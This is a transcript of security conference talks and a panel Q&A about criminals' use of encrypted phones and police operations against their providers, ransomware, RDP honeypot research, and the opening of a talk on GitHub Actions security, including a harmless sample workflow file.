And with the development of interception capabilities today, wiretaps can cover text messages, internet connections, telephone lines, all of that. So it's problematic for criminals, because they have to find other means to communicate; naturally, they don't want to be listened to by the police. The solution for them, you see it coming, is encrypted phones, which allow them to anonymize their communications. So there are really two categories of encrypted phones. There are regular phones, Android and iOS, which encrypt the phone's content by default, but there are also encrypted phones we could call modified: suppliers who create phones specifically to encrypt communications. For the iOS and Android phones, as I said, the phone's content is encrypted by default, which prevents analysis of the content. However, it does not prevent access to the data and calls that are transmitted, once the phone is seized. We also have messaging applications like Signal, WhatsApp, Telegram, even Snapchat, that some individuals use to encrypt their communications, because the messages exchanged are encrypted from one user to another, which brings extra protection for these individuals. However, this is not infallible: in the Salvatore Montagna case, we saw the RCMP intercept encrypted messages between users on BlackBerry phones. So even if these applications claim to be unbreakable and say that messages can't be intercepted, it doesn't always work out that way.
And on the side of modified phones, these are really phones where, for example, the GPS, the camera, the microphone, the Wi-Fi card, even the modem are removed, all of that, to ensure the anonymity of communications. So all the content of the phone is encrypted automatically, and the encryption keys are kept on the phone itself, which protects against wiretapping and the discovery of evidence on the phones. And the big feature of these phones is that all the content can be wiped remotely. So even if the police intercept a criminal's phone, the criminal can erase the content. Even if the police get access to the phone by technical means, it doesn't mean the data will still be there; it can be erased. So in theory, the police services would not be able to analyze these encrypted phones. It really goes beyond regular phones and commercial messaging applications like Signal and WhatsApp. A small global survey of encrypted phones: we can see that Canada is in fourth position, behind the United Kingdom, Germany and the United States, among the countries that produce the most encrypted phones. So it's really a problem that is present in Canada. We have providers that operate directly from Canada and also servers hosted in Canada. Here are some examples of providers we have had over the years, and as you can see, they have all been put out of service today. I'm going to talk a little more about what happened. Phantom Secure and Ennetcom were simply modified BlackBerrys. We have Sky Global, which was operated from Canada and the United States, and which worked on iPhone, Google Pixel, BlackBerry and Nokia. Then we had EncroChat, which presented what looked like a default Android operating system; but with a little manipulation,
the EncroChat operating system would boot, and it was an encrypted operating system. And ANOM, its particularity is that it was actually created as part of a police investigation, precisely to trap criminals. So that's it. For the price and the subscription, payment is naturally available in cryptocurrency to keep the user anonymous. The prices really vary from one supplier to another, but often there's a price for the device itself: we see here, for EncroChat, 1,000 euros to get the device. Then there's a monthly subscription starting from around a hundred dollars, which covers assistance. The assistance services are available 24/7, and this assistance is mainly about the remote wiping of the phone's content; that's essentially the service it offers. So at the start, the encrypted phone wasn't designed for criminal purposes; however, it has become so over time. We see that it has become a central element of organized crime: we find it in drug trafficking, money laundering, human trafficking, terrorism. And there are still a lot of users: we see that Sky Global had reached 170,000 before its closure, and among those users, several are criminals who use them for criminal purposes. So I'm going to talk a little about the police operations that were carried out against these providers. Ennetcom, which stayed open for three years, was brought down starting with an investigation into its owner, Danny Manupassa. Following this investigation, led by the Dutch police, there were searches of the company's servers, because the encryption keys were kept on those servers, and the servers were based in Canada. This investigation led to the arrest of the owner and other arrests, which led to the closure. Phantom Secure started in 2008.
Mexican drug traffickers were seen with these phones, but it's really around 2014, 2015, 2016 that it became better known and we heard more about it. Then the FBI started an investigation in 2017 into the owner of the company, Vincent Ramos. What the FBI did was have undercover agents buy encrypted phones from Vincent Ramos, and during the purchase discussions, Ramos allegedly said that Phantom Secure was specifically created to facilitate drug trafficking. Once he said that, that was the mistake: the FBI arrested them and put an end to the company. For EncroChat, there was a growing presence of these phones in organized crime groups, which led to the start of an investigation in 2017. The method used in that case was that the police forces exploited a security flaw by hacking the phones. The exact method was never revealed, but what is known is that they either installed a file on the servers responsible for updates, or installed a file on the phones, which let them infiltrate the network and access the encrypted communications. And that ended up shutting down the EncroChat service. In fact, when EncroChat realized that the security forces had infiltrated them, they sent a message to everyone's phones saying: throw away your phones, they're no longer safe, it's over. For Sky Global, once again following its growing popularity, an investigation started in 2018 by the Belgian police, in cooperation with other countries, France and the Netherlands. The method used in that case was that the police bought Sky Global phones, installed interception applications on them, and passed them off as regular Sky Global phones to people who bought them thinking they were genuine.
And that way, the police forces were able to listen to the communications and access the encrypted messages. ANOM, as I said earlier, was created by a police investigation, as an alternative to the other providers that had just been shut down, just before, in 2021. And it's the FBI that was responsible for it: they recruited an informant in the field, who gave them contacts to sell their phones. So there are people who bought them without knowing that all the messages were actually being sent to police servers. And that led to the arrest of more than 800 people across 16 countries. So the operation worked. And here are other companies in activity today; we can see them in different countries. In Canada, we have Armadillo Phone and Wireless Warehouse, which still exist. Their sites are accessible; you can buy encrypted phones. Are they related to criminal activities? We don't know, probably, but they are still in service today. Now, challenges in police investigations: the use of encrypted phones certainly brings challenges for law enforcement, especially delays. It increases the cost of investigations, because it can take a very long time to access the phones, and it requires technical skills that not all law enforcement agencies have. These delays can prevent arrests or the collection of evidence, or even prevent the investigation from being completed at all. It happens that the police simply cannot access the phones, so they just drop the charges, because the phone was their only evidence, for example. Then, on the methods, there are traditional and modern ones. Traditionally, to access the phones, we went by trial and error until we were able to get in. However, that can take a very long time, potentially millions of attempts. And today's phones will lock after a dozen attempts.
So that's practically impossible to do today. Today's methods are actually to exploit a security flaw in the phone that is unknown to the manufacturer. However, you need the skills to do it, which is not always the case. Then, on the choice of how to decrypt a device, normally we have two options. Well, I would say three. The third is that the suspect lets us access his phone, but naturally he won't. The two real options are to ask the manufacturer to decrypt the device, for example with a warrant or by requesting it, but manufacturers will want to prioritize the confidentiality of their users. Otherwise, the other option is really to carry out the decryption with technical means, as I explained a bit, by exploiting security flaws. And then, at the level of the courts, it also raises certain issues. We see, for example, that in the UK, using a phone to hide one's criminal activities is considered an aggravating factor. The same thing in Canada: in the decisions we reviewed, the use of a PGP phone has been considered an aggravating factor, because it was used to hide criminal activities. And the big difference between dedicated encrypted phones and regular phones is that the encrypted phones are not just incidentally involved in a crime, as regular iOS or Android phones can be; they were created deliberately to hide criminal activities, so that's the big difference at the level of the courts. So, I'll let David talk about the rest of our research. Excellent, thank you.
So, a bit beyond what Mélanie explained about how significant the service offering really was, what's also interesting to see is that about all the encrypted phone services launched over the last 15 years have been infiltrated by the police and closed, and in the end, they didn't keep all the secrets that criminals would have liked them to keep. There are also a lot of legal challenges: in the case of EncroChat, for example, the French police put all EncroChat users under surveillance, without knowing who they were, in which country they were, whether they were criminals or not. And there are a lot of questions to be asked: if the police can listen to anyone, no matter how, a lot of questions arise about that. Our goal was, therefore, to try to better understand this phenomenon by talking to the people in the justice system who investigate criminals and who have to manage all of this. And that's why, over the last few months, we talked to police officers, to defense lawyers, who are probably the most fun people to talk to, I encourage you to do so, find yourself a lawyer if you haven't already, and to prosecutors. And the judges, that's coming; we're in negotiations, it's always a little more delicate with judges. But the question we asked all of them, very simply, was: encrypted phones and encryption, does it change anything for you? A really simple question, but then we could hear them talk for hours. And basically, when we talk to them, it's interesting to see that this problem is actually quite hidden. Right away, we might think this would be for very high-level offenders. And it's really interesting to see that the high-level offenders of organized crime, in fact, just don't have a phone, period. Why?
Because then you can't be tracked, your GPS can't be followed, you can't be put under surveillance. So the problem can be completely eliminated by not having a phone, even if I don't know what kind of life you have without a phone, but fine. What came up a lot, in fact, when we talk about encryption, was organized crime of a medium level, because when we talk about street gangs and the like, they're not necessarily savvy enough to use this kind of technology. I even attended a presentation this week where, well, street gangs put everything they do on YouTube. So it's like the reverse of encryption, whatever the term for that would be; they are completely in the open. Otherwise, they talk a lot about fraudsters, of course. I don't know if you receive these regularly; I constantly receive offers to invest in cryptocurrencies. So people try to use encrypted messaging a lot for fraud. And of course, without any big surprise, pedophiles, who don't like us knowing they have pictures of young children and monitoring their communications. As for people who do hacking, people involved in those communities, well, since practically nobody gets charged, it flies a little under the radar, so it comes up less. One of the really interesting points is what can be done with AI and images today, but that's another topic. More pertinently, with everyone we talked to, our goal was really to find even one offender somewhere who used these modified phones, the dedicated encrypted phones, and talking to everyone, it's like a problem that doesn't exist. And that was still quite interesting to see, given that Canada produces a lot of these phones.
The companies that sell these phones are active in Canada, but talking with people, it's not actually a problem; people don't go to that level. And we can understand why. I don't know if anyone here still uses a BlackBerry, but when you look at your neighbor who has a Pixel 7 or an iPhone, if I tell you, look, take my BlackBerry instead, you'll see, it's not something that's super appealing. And so the problem they were observing was much more about all the encryption on the phones everyone uses, basically Android and iOS. And here, there are still some findings that are really interesting. One, we can always be skeptical, since we know the police like to sell themselves, to say how capable they are of doing everything. But when we talk to them, and even to the prosecutors, what they tell us is that today, there is no encryption that resists the tools they have. And if you think your iOS will protect you, you're kidding yourself. You have to forget that. And the big question, in fact, is how much time will it take? Will it take months to get there? Probably. But depending on who you are, they might put in the resources to get there.
So, in all the cases they described to us, they are able to break pretty much any encryption, but access to the tools, on the other hand, is not always guaranteed. If you're the police force of, I don't know, Rosemère, and there's a burglary and you find a phone, the chances that that phone will be decrypted are pretty slim. But if you have a murder in Montreal, if you have something touching national security, we realize that more powerful tools become accessible. So there is still a huge gap in accessibility to the tools, which perhaps also lets criminals tell themselves: you'll never find the information on my phone. And obviously, the older the phones are, the easier it is. There are still plenty of people saying you're not helping yourself if you cooperate when you're arrested, but it's not necessarily an insurmountable obstacle for the security forces. And the last thing, which we often forget: we focus on the phone, but the phone makes backups every day, every minute in fact, in the cloud, whether it's WhatsApp or iOS. Some companies are starting to encrypt backups, but it's far from being generalized, and often, what the services will do is bypass the encryption completely and just go to the backups in the cloud to look for the data, saving months of work. And this even applies to things like Snapchat, which is quite interesting and quite questionable to see. We think all these services protect us, but not necessarily as much as we would think.
Here, one of the things that was really interesting, and I would have done a little poll if I'd had more time: when the police seize a phone, what can they do with it? When we talk to the defense lawyers, the police, in their view, are able, once they take the phone, to go anywhere and take anything. If they take any of your phones, they have access to your bank accounts, your emails, your messengers, an incredible amount of information. And it's really interesting to see the point of view of the defense, which tells us: once they take the phone, they'll go look for anything, they'll find additional crimes, and it's pretty much game over; if they get into the phone, we're pretty much dead. On the other hand, when we were talking to the prosecutors and the police, it was a completely different discourse, where they told us: when I go into a phone, I have to be able to say exactly what application I want, what information I'm looking for, for what period. So the search really has to be limited, extremely targeted. And in fact, it's not even them who do it; there's a technical service, and what they said is that even when they send the warrant, the people in the technical service set up filters, and a filter may make a mistake, say between the 5th and the 6th of the month. So you don't even know if you received all the messages you were supposed to get from the phones.
And here's another problem that's quite important: when we ask for a warrant, for example, we'll say we want all the communications between Masarah, Andréanne and David. But obviously, in our phones, the contacts are not saved under "Masarah", "Andréanne" and "David"; the names are clearly not spelled right. Which means that when you're in the phone, there's no message that comes from "Andréanne", so you have to try to pivot, to find the link. What's Andréanne's other name? Or her hacker nickname, we'll talk about it later, in the Q&A maybe. You have to try to find how to connect people to their virtual identity, because the warrants are going to be extremely limited. And this is reassuring or disturbing depending on which side of the law you're on, but they were also telling us that when someone is sent into a phone, the search is scoped around the date of the crime. So it's not true that you can say: there was a murder last week, I would like to see the messages from two months ago. The judges will tell you no: you look at the days before the murder, the days after the murder, and that's it. So it's really interesting to see the challenges of collecting and pivoting in the phones; it's a real issue at the moment. And one last thing about the challenges: surprisingly, the most difficult thing to get access to, what was it? Well, it was the photos and videos that people take, which is probably the thing we want the most. Apparently, the expectation of privacy there is so strong that in the end, the judges will almost never grant it. Now, as I was telling you: do the phones play an important role? You have the answer in front of you.
It was really interesting to see that today, a very large part of the evidence comes from smartphones, and that's why the police put so much energy into breaking the encryption to get access. One officer gave me an example, a murder that happened last year in Montreal. He was working on a file on a subject, and the subject of his file got shot by someone. Which was convenient, in a way, because they were already there: they were able to follow the shooter to his car, in which he fled, and in the end they were able to arrest the two people involved in the murder. Then, going through the phones, there were all the messages about who had ordered the murder, how much was paid, all the details; there were even photos of the target's license plates, showing that the shooter had had the target under surveillance beforehand. It was perfect, and in the end, you don't even need anything else. You bring the phone to court, you show what's in it, and it's absolutely everything you need. So today it's really interesting to see how much of the evidence and the energy is put on smartphones, and it also raises the question of how we manage this problem, whether we invest elsewhere, and whether we're not all putting our eggs in the same basket, which is problematic.
And the last thing: we know phones play an incredibly important role, but at the same time, refusing to cooperate brings problems. In many cases, having an encrypted phone and not collaborating, not giving up your code, meant months lost in the justice system and really significant costs, and all of that meant sentences could end up higher simply because encryption was used. That's worth knowing: we can effectively be punished simply for using encryption technologies, and I don't know if we want to live in that world. And so, to finish, we asked people how all of this could be improved, and that's where all kinds of solutions come in. On the police side, of course, they'd like to be able to unlock every phone. That would be interesting to discuss in our Q&A: to what extent do we want to protect this data? In England at the moment there's a lot of debate on exactly this, access to encrypted data. The government would like access to everything, and solutions come up like creating an organization that would manage our encryption keys and grant access to certain information. But it's quite questionable whether we really want to allow that kind of access to anyone. And the other thing, which is quite interesting, is the feeling that the police might cheat a little. If the warrant says you don't have the right to look at the photos, are the police really not going to look at the photos? Are they going to stop scrolling through the phone? 
Once the police have the phone, we have nothing but their good faith to assure us they didn't abuse the system, and there are plenty of stories about exactly that: evidence is found in the phone first, and then a reason is found to obtain that information legitimately. That's really questionable, and the same goes for computers. So, to what extent are we able to protect our data? And can't we put measures in place to prevent that kind of surveillance, or at least limit who it applies to? And finally, the last thing, which we don't fully understand: several judges, when asked for a warrant to monitor a phone, don't necessarily understand what's happening or what the implications are, and that disconnect often allows the police to go a little further than they should. So, that's all for us. I hope it was interesting and that it raises important questions for the Q&A. If you have any questions, you can write to us or come talk to us in a few moments. Thank you. Scan the QR code, write your questions, and we'll see you in 15 minutes for a little Q&A session together. Time for a little coffee, a little beer, and see you right away. Let's go. Oh, we have fewer people for the questions. Okay, thank you for coming back. Let's start this Q&A session, and don't forget the QR code I showed earlier, if ever you want to ask questions. So, before taking the audience's questions, I had prepared a few questions for our speakers, so I'll start with that to kick off. And we'll start with Vicky, because you were the first one to present. Thank you very much for your time and for the presentation. Thank you for having me. 
So, I know you have a background in criminology, and you know that in our field we often talk about different theories. We know that when opportunities exist, delinquents will try to exploit them, and then after a while we see a lot of them being exploited and the curve plateaus. This kind of theory was applied to cybercrime, where we saw that different types of cybercrime were highly exploited for a really long time, and then slowly fewer and fewer people exploited them just because the marginal revenue dropped. Do you think that for ransomware we're kind of reaching this plateau, or are we still on the upswing of the curve, if you see what I mean? So, all right, I've never had a mic before, so let me know if you can hear me. Yeah, great. So I think the answer is not that simple, because as things progress and we have new software coming out, there are always new opportunities being created. Until software is sold with zero vulnerabilities, and defense is built into the creation of those projects, I don't think we're going to be in a position to say that the opportunities for ransomware are lacking. I also think that opportunities are sought after, and they're going to find one when they're looking. And there's still money to be made, so as long as money is at play, they're going to find a way. So that would be my answer. I used to think that ransomware was over in 2018, to be honest, and then RaaS happened and it just never stops. I keep wondering when we'll reach that plateau where ransomware will be out and we'll have another kind of threat that we'll all be talking about, but it just doesn't seem to happen, so I totally agree with you, maybe not. Maybe I can ask Andréane another question. 
One thing I want to say is, if you know Andréane, you know she works with Olivier at GoSecure and they're doing amazing research. And maybe now you'll know, because I'll tell you, that they've been accepted at Black Hat USA this year, so they'll go and present there this summer. I know the research they'll be presenting is kind of a follow-up to what she's presented here, so maybe tell us a bit about what you're going to present at Black Hat and what the plan is. So, one of the next steps of our research is to analyze all the compromised sessions, the ones where the attacker succeeded in entering our system. We'll analyze all the video footage; we have over 100 hours to look at, so there's a lot of work before Black Hat. But we already started looking at them and we saw different profiles, and for our Black Hat proposal we suggested analyzing those profiles through Dungeons & Dragons character classes. So you have those people, oh, I can't remember the names of the categories now, but there's a wizard for sure, there's the bard who doesn't seem to know what he's doing, there's, I can't remember the rest. There's always a goblin. The what? A goblin. No, there's no goblin, but you know, there are people entering not knowing what they're doing; it looks like they maybe bought the RDP access from someone else. Others know exactly what they're doing: they already have their tools, they install them very fast, and they do their thing. And there are others who compromise other computers through this RDP session. So there's a lot of different behavior that's very interesting, and we'll be presenting the video footage with examples of what we see and the analysis of the different profiles. 
Nice, and you're really seeing what attackers are doing in your honeypots, so this is rare data that we don't usually have, which probably explains why, along with your amazing work, you've been accepted at Black Hat. Yeah, it will be interesting. So I have a question for you too: when is B-Sides, and where? So B-Sides is going to be in September, I want to say the 16th of September. It's going to be at the bank, same venue as last year. We're going to have free workshops and trainings, tons of free food, and amazing talks like last year. We did B-Sides the first year and we kind of had to take the talks we could get, and last year we were just submerged with so many great talks, so hopefully this year we have the same quality of speakers. It's $40 and you even get a free t-shirt, so what more can I say? And it's another chance to gather the community together and see each other, which is kind of nice: half of the year at Nordsec, the other half at B-Sides Vancouver. But truly, a question on your presentation. Since you've interviewed lawyers as well as police officers, which group had the best vision of the problem and the best knowledge, at least experientially, of how phones are actually used in criminal cases? Maybe I'm being a little too punk, but can we blindly trust the police about what they do in the phones? I'm sure Mélanie will be able to answer this from everything you've heard. So, can we trust that our rights are respected? Well, you know, with police officers it's always interesting: they'll tell us, well, there are things we can't share, investigative techniques, all that. 
I would say that the lawyers gave us the other side compared to the police's view, so they gave us more information on that. That's what I find fun about interviews: you get different points of view, and the police side really is the opposite of the side of the lawyers and criminals. That's what's really interesting about interviews. But you have to see that there's a huge amount of risk. Even if we might think that once the police have the phone they'll do what they want, there's still a big risk in digging around in it: getting caught, and seeing the case fall apart. So I like to think they respect our rights and all that, but there's a little bit of, how can I say, they'll peek a little in the corners to see if they find something interesting. But in fact, I was really just asking: did the people you interviewed answer based on their impression of what happens, or did they have concrete experience of phone evidence in actual cases? Yes, absolutely. It was really people drawing on their own experience, the files they had, how they handled those files. They really drew on their lived experience. And was it something recurring in their experience? Yes, in fact, there's probably no criminal case anymore that doesn't involve a smartphone. The question becomes more, are we able to use the evidence from the phone to convict someone, given that the phone is going to be encrypted? A bit like today, what crime isn't vaguely cyber? I think all crimes are going to be cyber. I don't know if that's because the criminals are talking on Messenger. OK. That's good, thank you. If I ask a question to the whole panel, I might switch to English. That's very Montreal, in fact. Just a question for the whole panel. 
I think there's one thing that comes out of all your presentations: whether or not attackers are sophisticated, whether it's through using encrypted phones, ransomware, or attacking RDP honeypots. Are they sophisticated from your perspective? Are we really facing individuals who are, yes, innovating all the time, and we're having a hard time keeping up, or are we mainly facing dumb people hacking for hacking's sake? It's a really broad question, but I think it needs to be asked, because we live in an industry where we always talk about attackers as the guys, or girls, in the hoodies who are highly motivated. And I'm just wondering, from your experience, what is it? So, well, it's important to have the same definition of sophistication; this is where the argument lies. In my research, I think of sophistication as anything beyond the pure basic, easy attack. Like, my mother cannot do this attack, right? You need some knowledge of how to do it. There's the plain basic, very opportunistic kind, we can use that term, opportunistic, and then I considered a bit more sophisticated those who think about what they're doing and try to do better, by leveraging information and trying to imitate behavior. So this is my definition, but people don't all have the same one. But to answer the question, I think that most are not the highly motivated, very good hackers. Most, at least for RDP attacks, are kind of basic opportunistic attackers, and that's all. So, reaching for the low-hanging fruit. Yes, exactly. If I can just reverse the question before we go to the other speakers: how many attacks on your RDP honeypots were actually really sophisticated, where you could see a human behind the attack, really trying to get in? It's hard to tell for sure. 
Like, who is human and who is not? Well, there's a human behind the screen, but I mean, you know. I can't tell; I don't have an answer for you. I guess it would be the ones who actually compromised the systems and then started to do things like watching offensive videos. Yeah, of course they are human, right? They were able to compromise it, and I see their clicks, their keyboard, and it's obviously not a computer doing that. For those people, we have about 3,000 sessions, different video footage. So there are at least 3,000 humans. And then from these 3,000, at your next presentation, you'll be able to let us know how many were at least reaching for the stars. Good answer, yes. Exactly, yes. What about you? So from my research, I would say your top 1% of ransomware creators would be very sophisticated. We can think of the writers of LockBit for one, and the top dogs, well, not dogs, but the top ones would be, yes, sophisticated. I don't think the affiliates on down are as sophisticated, because they rely on other people's products. But I also think the question should be: do they really need to be sophisticated when their targets are not? If cheap shots still work, if your basic phishing attack still works, why would you waste your time on something that's going to cost you more money, be harder to pull off, and take more time? If your intention is to get money, it's probably smarter to take the path of least resistance, and sometimes sophistication is not needed for that kind of attack. So that would be my answer. That's a good point. Well, I would say for encrypted phones, once again: sophisticated, what does that mean? 
But you know, often the people who use encrypted phones are organized crime, the bigger groups; it won't be the smaller criminals using encrypted phones. So I would say more sophisticated. And maybe one last point: we've seen a change, and I think Andréane's work really showed it, this professionalization of the attackers, where they're attacking from eight till four, Monday through Friday, and there's this question of relentlessness also. So it's not someone casually poking at targets, trying to get in. If you remember the movie Hackers, great movie, but they're just poking around and stumble into something. Right now it's a bit more coordinated. We have state actors attacking, companies attacking each other as well. So this professional aspect, this organization, doesn't mean they're more sophisticated; it's just that they're more organized, and even if they're not better than they used to be, because they're organized, they can achieve more. True, thank you. I'll go with the questions from the public and maybe jump in after that. David and Mélanie, there's a question that says: in the presentation, law enforcement and the justice system seem to take a position against the protection of privacy in order to help them in their work. What do you think? Tough question. It's not necessarily taking a position against; it's always a question of point of view. We have a continuum: on one side, we protect people by arresting criminals, and on the other, we protect people by preventing their private lives from being made public. And I think it's a choice of society, and a choice of politicians, to say where we want to put the barrier. 
And of course, the people whose job is to put criminals behind bars, that's their raison d'être, that's what drives them, so they're always going to push to make their work as simple as possible. So we do see a certain movement toward getting access to this information. But at the same time, I find the counter-powers have worked really well so far in Canada, in the sense that when we talked, for example, to the prosecutors, what they actually have the right to look at is so narrow that it's almost useless in the end. I think we're still in good shape here, especially when you compare, as I said, to England, where it's gone completely the other way, to the point where you wonder whether there's any private life left. Mélanie, your turn. I would say much the same thing as David: there's always this debate, and not just with encrypted phones, in cybersecurity in general, between privacy and security. That debate is always there. But I would say that in Canada, we do still protect people's data, thankfully, at least in my opinion. Maybe I'll just continue with you on encrypted phones: have you seen legal uses of encrypted phones in your research? Can you give examples, or are we really just in an illicit world? The marketing really targets criminals. Are there companies that use these phones? Because precisely, they give you a higher level of confidentiality, possibly, but it's probably a drop in the ocean, because these phones are not widely known. There's no advertising on TV saying, buy your BlackBerry PGP. So word doesn't spread outside those circles, and I think we can say it's mostly criminals, in the end. 
And there's the example of one supplier who, after other suppliers had been shut down, tried to make their company more legitimate and weed out the criminal clients to avoid being shut down themselves. But they didn't really succeed; they decided to just close the company before they were arrested. So I would also say that the majority of people who use these phones do it to hide criminal activities, illegal stuff. Have you thought about interviewing these operators, if they're reachable, to find out why they develop these phones, and whether they have a different vision of what their service is for? Yes, exactly. But in a world where we're funded by the Fondation du Barreau du Québec, that's the question. Okay. Vicky. So, from somebody in the audience: do you think game theory could be applied to analyze attacks and identify potential false flag operations? I think you could, but it would also be difficult, because what we found with ransomware groups is that they share a lot of similarities in how they behave. So attributing who does what becomes very difficult, and you can't know for a fact. There's also a lot of "I'm going to make this look like somebody else did it so I can put the blame on them"; this is often done for political reasons. So when you're playing with that and trying to tease out false flags, you could do it, but I don't know if it would be the most efficient use of game theory. What would be the most efficient way to use game theory? In cybersecurity, I guess. In cybersecurity, okay. I do think it's a good way to use it when you're studying extortion, when you're looking at a conflict head on. I don't think phishing as a whole would be a good use of game theory. 
Ransomware is interesting because there's that back and forth, I don't want to say collaboration, but you do need to collaborate with the victim to get a payment. There is that interaction that can be studied. So I think crimes where both parties need to interact with each other would be a good usage of game theory. Yeah, true. Thank you. Andréane, in your IPs, you had Monaco. Do you know why? Monaco? No, I don't, but this is also part of the next steps: to look at shared IPs, or IPs very close to one another, and investigate where those IPs are and whether they're from, the word escapes me, the companies that are specialized in making traffic go through them. DNS? Maybe, I don't know. I don't know either. Like a company that's only there to... Forward traffic? Forward traffic, yes. Sorry for that. Team effort. So it's not from one computer, but from a seller of proxies. So this will be part of it; we might answer the question that way, because if it's a proxy company... Okay, so determining whether the IP the attack comes from is owned by a proxy provider, whether the attacks are really from Monaco. Yes. Makes sense, yeah. Sorry, difficult to answer, but yes. Tell me, somebody asked, where were the honeypots located? Did you deploy them all over the world? No, they're all located in an AWS data center in the United States. This might change. I know Olivier already tested putting honeypots a bit everywhere in the world, but he didn't get much of a 
conclusion from it, but I would like to do it again and look at the data for myself, to compare whether the United States was specifically targeted or whether there's a difference between the honeypots; but they were all in the same place for this project. Interesting. And it's true, he did try. We did it, yeah, you were there. We hosted honeypots all over the world in a research project and we thought the results would be different, but they were not. In the end, it was just the same thing. So I would be curious whether RDP honeypots would have different findings. Maybe one last question I'd ask you all: if I gave you the opportunity to do research with the millions of dollars I have, and absolutely no headaches, in the sense that you can do the research you want, ask the research questions you want, and reach the study population you want, whom would you reach? What would you study to answer the research questions you addressed today? And why? Because what I'm seeing, in criminology and in other research, is that we're stuck doing secondary analysis of data from white papers, or, for example, interviewing people who have heard about the phenomenon or seen it but haven't lived it for the purpose we want to study. So I'm just wondering: if ever you could do research to answer your questions by reaching a certain population, what would it be? And I'm giving you my funding, my million-dollar foundation grant. And we have no problems with ethics? No problems with ethics. And that's the hard part, honestly. This never happens. It's rare, for sure. So to me, it's this whole class of enablers, basically, people who enable others to do crime. I think these are the most interesting people; we've barely managed to talk to them, interview them, and try to understand who they are, where they're coming from, what their goals are, are they happy? We don't know. 
One of my students spent months hanging out on different forums, Exploit, XSS, Alligator, and others. And she managed to interview 18 Russian hackers, which was really quite interesting, but that was months and months of effort. So we asked them, what are the three skills you need to be a good hacker, and where did you learn them? And that's the kind of stuff that I really like. It takes forever to earn their trust and to just be there, and that would be something if I could... I wouldn't want millions of dollars. I would want a time machine so I can fast-forward through all that part and get to the juicy stuff at the end. Interesting. Okay, so I have so many ideas. And since ethics is not a problem, I'm going to go with the real one. What I would really want to do, if ethics and none of that was a problem, is group interviews in one room: you put all the APTs, from Russia, from Iran, from China, from North Korea, all in the room, and no agents anywhere, obviously. And then I would just ask all the questions about the rules of engagement and the tools for espionage, because I think it would be so interesting to study from the inside how things happen. APT groups have so far been one of those things that are really hard to study because you can't get close. So that's what I would do. That would cost a lot. Well, you said millions. And you, Andréane, what's your dream research? So, call me uncreative, but I cannot think of any project other than what we're doing right now: looking at the video footage of what the hackers do once they compromise a computer. I would just expand this a thousand times and look at the footage for hours. I love video footage. Are you doing your dream research? I think so. 
Yeah, for my PhD, I looked at footage of police interviews and things like that, and I loved it, and I know how to study that. So I really liked it. It's a bit voyeuristic: they don't know we're looking at them, and they're compromising computers, and I kind of like it. Nice, interesting. Mélanie, do you want to add something? I was going to say much the same thing as you, Andréane. At the end of the day, they would be the most difficult ones to reach when doing research. In interviews you're often going to have desirability biases, or other biases, but just to see them, as you say, in their environment without them knowing, it avoids those biases, and I think it would be interesting to study that. Interesting. On my side, I'll share, just because I can. I think I'd want to hang out with hackers, but real ones, in Eastern Europe or in Russia, and see what their reality is and understand how and why they participate in such activity. With no judgment; and when I say hang out with them, it's basically just talk, but you have to accept that you're not just observing them, you're interacting with them, so you're having an impact on them. I mean, we could share the project, pick a nice destination with a beach somewhere, combine all of these together: we study them, we hang out, and then have a nice vacation, because, hey, we're not paying. Exactly. Well, thank you so much, everyone, for being here. We have a 15-minute break, then there are two other presentations coming up, and the closing ceremonies, so please stay. And thanks for listening to us and for being at Nordsec. Thank you all. Oh, and there's a raffle too, so stay tuned and be here for the ceremony. Hello, hello, hello. Good. 
So we continue with the unofficial subsection of the conference. We have Magno here. Magno Logan works as an information security specialist for Trend Micro. He specializes in cloud, container, and application security research, threat modeling, and DevSecOps. In addition, he has been tapped as a resource speaker for numerous security conferences around the globe. So please welcome Magno. There you go. Thanks, everyone. So, yeah, today we're going to talk about abusing GitHub for fun and profit: Actions and Codespaces security. I'll focus more on the Actions part. Codespaces is research I did together with my teammate, Nitesh; I'll present a few things at the end, and there's more coming up at the next few conferences as well. We have another talk at NDC next week, so stay tuned for that. Just a little bit about myself: I'm originally from Brazil, I've been in Canada for five years now, and I'm part of the Nebula cloud and container research team. I have a blog called Katana Security; it's currently offline, but I should probably restart it. I'm also an instructor at GoHacking, a cybersecurity company in Brazil. We provide intermediate to advanced trainings in cybersecurity, and we're trying to bring those trainings to Canada, in English as well; those are live and online trainings. The best way to reach me is through LinkedIn. This is the QR code; if you want to scan it, feel free. I guarantee there's no malware there. On this one, at least. So these are the topics for today. I'll try to go over them really quickly since time is short. But if you want to learn more, this research around GitHub Actions took me at least three to four months of research and then writing a blog post; there's a lot of content there that I won't be able to cover in this talk. 
But first, a special thanks to Felipe Proteus, a friend of mine who helped me with this research. Okay. So, who here has used GitHub Actions? Okay, a few hands. Who here uses it in production? Fewer, okay. Who here has played with GitHub? Yeah, okay, that's sort of expected. That's fine. If you work with CI/CD tools, things like Jenkins, GitHub Actions has a similar approach, but you don't need a separate server or separate environment to do your automation, your CI/CD: continuous integration, continuous deployment. The idea is that you have a file inside your repo, and whenever there's an event, something that happens inside your repo, like a push or a pull request or a change, it triggers the workflow. That event spins up, or actually assigns, a VM inside Azure, since GitHub is now owned by Microsoft. These are not containers, they're virtual machines, called runners. Each job or automation, which is a series of steps or scripts, spins up its own runner, and inside those runners, inside those jobs, you can run scripts, you can run commands, and you can also run other actions. So inside your action you can call other actions; there's some dependency there. And there are three kinds of runners you can have: Windows, Linux (based on Ubuntu), or macOS. These are provided by GitHub, so any account, any free account today, can leverage Actions. Of course, there's a limit, I believe around 30 hours per month, but you can use them today. I guess one of the reasons for the high adoption rate of GitHub Actions is that it's free, and of course people like free stuff, but also the marketplace. The marketplace is where anyone can develop their own actions and make them available, so people can use them and avoid reinventing the wheel. 
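To make the moving parts concrete, here is a minimal, hypothetical workflow file of the kind being described. The file path, workflow name, and step names are made up for illustration, but "on:", "runs-on:", and "steps:" are the standard GitHub Actions keys, and actions/checkout is GitHub's official checkout action:

```yaml
# .github/workflows/ci.yml — a minimal, hypothetical example
name: CI
on: [push, pull_request]        # repo events that trigger the workflow
jobs:
  build:
    runs-on: ubuntu-latest      # GitHub-hosted runner: an Ubuntu VM in Azure, not a container
    steps:
      - uses: actions/checkout@v3     # GitHub's official action: copies the repo into the runner
      - name: Run a command
        run: echo "Hello from the runner"
```

Committing a file like this under .github/workflows/ is all it takes; the next push assigns a runner and executes the steps in order.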
